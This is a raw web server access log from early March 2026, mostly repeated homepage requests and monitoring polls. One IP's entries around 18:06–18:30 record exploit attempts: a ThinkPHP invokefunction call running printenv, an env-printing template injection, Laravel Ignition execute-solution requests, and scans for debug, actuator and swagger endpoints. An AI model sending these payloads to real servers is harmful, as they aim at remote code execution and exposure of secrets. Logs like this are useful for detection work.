65.108.120.157 - - [02/Mar/2026:09:12:53 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:09:15:20 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
18.217.186.74 - - [02/Mar/2026:09:16:33 +1000] "GET /admin/login HTTP/1.1" 200 43223 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)"
65.108.120.157 - - [02/Mar/2026:09:31:18 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:09:37:55 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:09:45:24 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
18.217.186.74 - - [02/Mar/2026:09:48:47 +1000] "GET /admin/login HTTP/1.1" 200 43255 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)"
65.108.120.157 - - [02/Mar/2026:09:56:18 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:09:59:48 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:10:04:14 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:10:11:16 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:10:15:30 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:10:29:37 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:10:36:16 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:10:45:20 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:10:54:35 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:11:01:18 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:11:15:20 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:11:19:35 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:11:26:17 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:11:44:36 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:11:45:25 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:11:51:18 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:12:09:37 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:12:15:23 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:12:16:16 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:12:34:38 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:12:41:18 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:12:45:29 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:12:59:38 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:13:06:18 +1000] "GET / HTTP/1.1" 500 1077598 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:13:15:23 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:13:24:38 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:13:31:21 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:13:45:43 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:13:49:38 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:13:56:16 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:14:14:40 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:14:15:27 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:14:16:34 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:14:20:53 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:14:21:06 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:14:39:33 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:14:45:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:14:46:15 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:15:04:38 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:15:11:19 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:15:15:23 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:15:29:37 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:15:36:16 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:15:45:25 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:15:54:39 +1000] "GET / HTTP/1.1" 500 1077508 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:16:01:22 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:16:15:26 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:16:19:43 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:16:26:19 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:16:44:43 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:16:45:23 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:16:51:19 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:17:09:38 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:17:15:24 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:17:16:17 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:17:34:43 +1000] "GET / HTTP/1.1" 500 1077514 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:17:41:16 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:17:45:24 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:17:59:40 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
100.27.186.159 - - [02/Mar/2026:18:06:10 +1000] "GET / HTTP/1.1" 500 409552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
100.27.186.159 - - [02/Mar/2026:18:06:12 +1000] "GET / HTTP/1.1" 500 1077286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:18:06:14 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
100.27.186.159 - - [02/Mar/2026:18:06:22 +1000] "GET / HTTP/1.1" 500 1076818 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:06:28 +1000] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=printenv HTTP/1.1" 500 1085234 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:06:37 +1000] "GET /index.php/module/action/param1/$%7B@print%28env%29%7D HTTP/1.1" 404 6603 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:06:40 +1000] "POST /_ignition/health-check HTTP/1.1" 405 1056022 "-" "Mozilla/5.0"
118.127.40.73 - - [02/Mar/2026:18:15:28 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
100.27.186.159 - - [02/Mar/2026:18:21:47 +1000] "POST /_ignition/execute-solution HTTP/1.1" 302 434 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:21:49 +1000] "GET / HTTP/1.1" 500 1077112 "https://www.printmanagertenant.posscales.com.au/_ignition/execute-solution" "Mozilla/5.0"
65.108.120.157 - - [02/Mar/2026:18:24:47 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
100.27.186.159 - - [02/Mar/2026:18:30:15 +1000] "GET /__debug__/execute?cmd=printenv HTTP/1.1" 404 6603 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:30:16 +1000] "GET /script HTTP/1.1" 404 6603 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:30:16 +1000] "GET /actuator/env HTTP/1.1" 404 6603 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:30:17 +1000] "GET /env HTTP/1.1" 404 6603 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:30:18 +1000] "GET /v2/api-docs HTTP/1.1" 404 6603 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:30:19 +1000] "GET /api-docs HTTP/1.1" 404 6603 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:30:20 +1000] "GET /swagger.json HTTP/1.1" 404 6603 "-" "Mozilla/5.0"
100.27.186.159 - - [02/Mar/2026:18:30:21 +1000] "GET /swagger/v1/swagger.json HTTP/1.1" 404 6603 "-" "Mozilla/5.0"
65.108.120.157 - - [02/Mar/2026:18:31:22 +1000] "GET / HTTP/1.1" 500 1077512 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:18:33:17 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:18:37:37 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:18:39:29 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:18:45:27 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:18:58:00 +1000] "GET / HTTP/1.1" 500 1077602 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:19:04:34 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:19:15:24 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:19:23:02 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:19:29:35 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:19:45:33 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:19:47:58 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:19:54:34 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:20:12:59 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:20:15:27 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:20:19:37 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:20:37:59 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:20:44:35 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:20:45:28 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:21:02:59 +1000] "GET / HTTP/1.1" 500 1077602 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:21:09:39 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:21:15:26 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:21:28:02 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:21:34:37 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:21:45:27 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:21:53:02 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:21:59:41 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:22:15:33 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:22:18:02 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:22:24:35 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:22:43:01 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:22:45:35 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:22:49:54 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:22:54:19 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [02/Mar/2026:22:57:55 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:23:15:28 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:23:16:25 +1000] "GET / HTTP/1.1" 500 1077600 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
74.7.244.29 - - [02/Mar/2026:23:20:44 +1000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
65.108.120.157 - - [02/Mar/2026:23:23:00 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
3.142.122.28 - - [02/Mar/2026:23:31:58 +1000] "GET /admin/login HTTP/1.1" 200 43223 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)"
3.142.122.28 - - [02/Mar/2026:23:34:44 +1000] "GET /admin/login HTTP/1.1" 200 43223 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)"
65.108.120.157 - - [02/Mar/2026:23:41:24 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [02/Mar/2026:23:45:26 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [02/Mar/2026:23:48:01 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:00:06:21 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [03/Mar/2026:00:12:57 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [03/Mar/2026:00:15:31 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [03/Mar/2026:00:31:23 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
